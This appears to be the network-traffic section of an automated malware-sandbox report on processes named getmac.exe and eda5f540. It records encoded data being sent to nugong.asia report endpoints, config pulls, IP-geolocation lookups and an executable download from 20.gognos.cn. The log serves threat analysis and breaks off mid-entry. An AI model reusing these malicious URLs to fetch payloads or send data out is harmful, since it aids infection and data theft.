      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      getmac.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Wed, 04 Oct 2023 10:50:40 GMT
      Ali-Swift-Global-Savetime: 1696416640
      Via: cache5.l2de2[4,3,200-0,M], cache14.l2de2[5,0], cache8.nl2[0,0,200-0,H], cache8.nl2[1,0]
      Age: 16
      X-Cache: HIT TCP_MEM_HIT dirn:6:22464691
      X-Swift-SaveTime: Wed, 04 Oct 2023 10:50:40 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309c16964166562562901e
    • flag-us
      DNS
      49.134.227.101.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      49.134.227.101.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      205.48.246.47.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.48.246.47.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      sp1.baidu.com
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      104.193.88.77
      www.wshifen.com
      IN A
      104.193.88.123
    • flag-us
      GET
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      getmac.exe
      Remote address:
      104.193.88.77:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Wed, 04 Oct 2023 10:50:58 GMT
      Expires: Wed, 04 Oct 2023 10:50:58 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=B3390398C56DC0BD924D34F50CA5B6C0:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Set-Cookie: BAIDUID=FCABFA31CB21E04302DDF4B2CB49FE15:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 30586970930361527306100418
      Tracecode: 30586976640601061130100418
      X-Powered-By: HHVM
    • flag-cn
      GET
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6
      eda5f540
      Remote address:
      116.163.24.195:443
      Request
      GET /report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6 HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: nreprot.nugong.asia
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Wed, 04 Oct 2023 10:50:59 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 8063151262030816650
      Connection: close
      X-Cache-Lookup: Cache Miss
    • flag-us
      DNS
      77.88.193.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.88.193.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.20.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.20.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.21.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.21.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ocsp.trust-provider.cn
      eda5f540
      Remote address:
      8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      117.27.246.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      119.36.90.164
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.143.236.7
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.248.38.100
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.13.153.152
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.48.138.18
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.206.23.199
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      112.50.95.96
    • flag-cn
      GET
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      eda5f540
      Remote address:
      117.27.246.96:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Wed, 04 Oct 2023 10:50:59 GMT
      Age: 1
      CF-Cache-Status: EXPIRED
      CF-RAY: 80f216982cfd9836-SJC
      ETag: "23d9859148cd758aa9eac8e5e5b3fa7b16968b28"
      Expires: Sun, 08 Oct 2023 04:10:25 GMT
      Last-Modified: Sun, 01 Oct 2023 04:10:26 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb2
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 nxian198:8 (Cdn Cache Server V2.0), 1.1 PS-JJN-01XpV172:3 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 651d3c67_PS-JJN-01XpV172_34442-64456
      cache-via: cache.n172-013-214.fzmp
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 16964166594cbdc009500c9da237cb00a6df5b6771
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n172-013-214.fzmp(HIT)
      X-Bdsa-Cache-Tm: 1696414823-1764
      Accept-Ranges: bytes
      via: n172-013-214.fzmp.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=2
    • flag-us
      DNS
      101.14.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.14.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      101.15.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.15.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      96.246.27.117.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      96.246.27.117.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.2.2.234.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.2.2.234.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      211.112.123.233.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      211.112.123.233.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Wed, 04 Oct 2023 10:51:08 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 16610356150237786035
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/psexe.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:27:26 GMT
      Etag: "61dce90040ba158479521e19bcdc6546"
      Content-Type: text/plain
      Date: Wed, 04 Oct 2023 10:30:35 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7528396351655483740
      x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
      Content-Length: 10896
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6368157307893339986
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      157.123.68.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      157.123.68.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      171.39.242.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      171.39.242.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      59.128.231.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      59.128.231.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      20.gognos.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      20.gognos.cn
      IN A
      Response
      20.gognos.cn
      IN A
      222.173.195.26
    • flag-us
      DNS
      20.gognos.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      20.gognos.cn
      IN A
      Response
      20.gognos.cn
      IN A
      222.173.195.26
    • flag-cn
      GET
      http://20.gognos.cn:59116/deodej2d0.exe
      getmac.exe
      Remote address:
      222.173.195.26:59116
      Request
      GET /deodej2d0.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 20.gognos.cn:59116
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 04 Oct 2023 10:51:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 12138353
      Last-Modified: Tue, 03 Oct 2023 15:56:59 GMT
      Connection: keep-alive
      ETag: "651c39cb-b93771"
      Accept-Ranges: bytes
    • flag-us
      DNS
      126.179.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      126.179.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      26.195.173.222.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.195.173.222.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      26.195.173.222.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.195.173.222.in-addr.arpa
      IN PTR
      Response
    • 116.163.24.195:443
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip
      tls, http
      eda5f540
      17.1kB
       486.1kB
       358
      356

      HTTP Request

      GET https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip

      HTTP Response

      200
    • 204.79.197.200:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      tls, http2
      1.9kB
       9.3kB
       22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204
    • 116.163.24.195:80
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      http
      getmac.exe
      40.1kB
       1.1MB
       828
      827

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/Lander.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/urlmd5.json

      HTTP Response

      200
    • 101.227.134.49:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      getmac.exe
      1.1kB
       4.4kB
       14
      12

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      getmac.exe
      782 B
       2.2kB
       7
      5

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 104.193.88.77:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      getmac.exe
      1.4kB
       7.1kB
       19
      16

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 116.163.24.195:443
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6
      tls, http
      eda5f540
      1.6kB
       1.0kB
       13
      12

      HTTP Request

      GET https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6

      HTTP Response

      200
    • 117.27.246.96:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      eda5f540
      525 B
       1.8kB
       6
      4

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 116.163.24.195:80
      http://down.nugong.asia/cfg/cmc/psexe.txt
      http
      getmac.exe
      2.1kB
       12.5kB
       20
      19

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200
    • 222.173.195.26:59116
      http://20.gognos.cn:59116/deodej2d0.exe
      http
      getmac.exe
      451.3kB
       12.5MB
       8946
      8930

      HTTP Request

      GET http://20.gognos.cn:59116/deodej2d0.exe

      HTTP Response

      200
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
       90 B
       1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      4.159.190.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      4.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      241.154.82.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      241.154.82.20.in-addr.arpa

    • 114.114.114.114:53
      down.nugong.asia
      dns
      eda5f540
      62 B
       392 B
       1
      1

      DNS Request

      down.nugong.asia

      DNS Response

      116.163.24.195
      123.12.213.243
      119.188.86.194
      1.62.64.68
      122.189.171.55
      221.15.67.105
      42.7.60.104
      110.249.196.101
      36.248.54.85
      119.167.229.212
      116.172.148.7
      125.39.165.235
      218.29.205.139
      123.12.213.187
      123.12.235.196

    • 8.8.8.8:53
      114.114.114.114.in-addr.arpa
      dns
      74 B
       106 B
       1
      1

      DNS Request

      114.114.114.114.in-addr.arpa

    • 8.8.8.8:53
      208.194.73.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      208.194.73.20.in-addr.arpa

    • 8.8.8.8:53
      254.20.238.8.in-addr.arpa
      dns
      71 B
       125 B
       1
      1

      DNS Request

      254.20.238.8.in-addr.arpa

    • 8.8.8.8:53
      195.24.163.116.in-addr.arpa
      dns
      73 B
       132 B
       1
      1

      DNS Request

      195.24.163.116.in-addr.arpa

    • 8.8.8.8:53
      41.110.16.96.in-addr.arpa
      dns
      71 B
       135 B
       1
      1

      DNS Request

      41.110.16.96.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
       158 B
       1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      200.197.79.204.in-addr.arpa
      dns
      73 B
       106 B
       1
      1

      DNS Request

      200.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      26.35.223.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      26.35.223.20.in-addr.arpa

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      getmac.exe
      62 B
       94 B
       1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.49
      101.227.134.27

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      getmac.exe
      62 B
       122 B
       1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      49.134.227.101.in-addr.arpa
      dns
      73 B
       132 B
       1
      1

      DNS Request

      49.134.227.101.in-addr.arpa

    • 8.8.8.8:53
      205.48.246.47.in-addr.arpa
      dns
      72 B
       143 B
       1
      1

      DNS Request

      205.48.246.47.in-addr.arpa

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      getmac.exe
      59 B
       144 B
       1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      104.193.88.77
      104.193.88.123

    • 8.8.8.8:53
      77.88.193.104.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      77.88.193.104.in-addr.arpa

    • 8.8.8.8:53
      226.20.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      226.20.18.104.in-addr.arpa

    • 8.8.8.8:53
      226.21.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      226.21.18.104.in-addr.arpa

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      eda5f540
      68 B
       300 B
       1
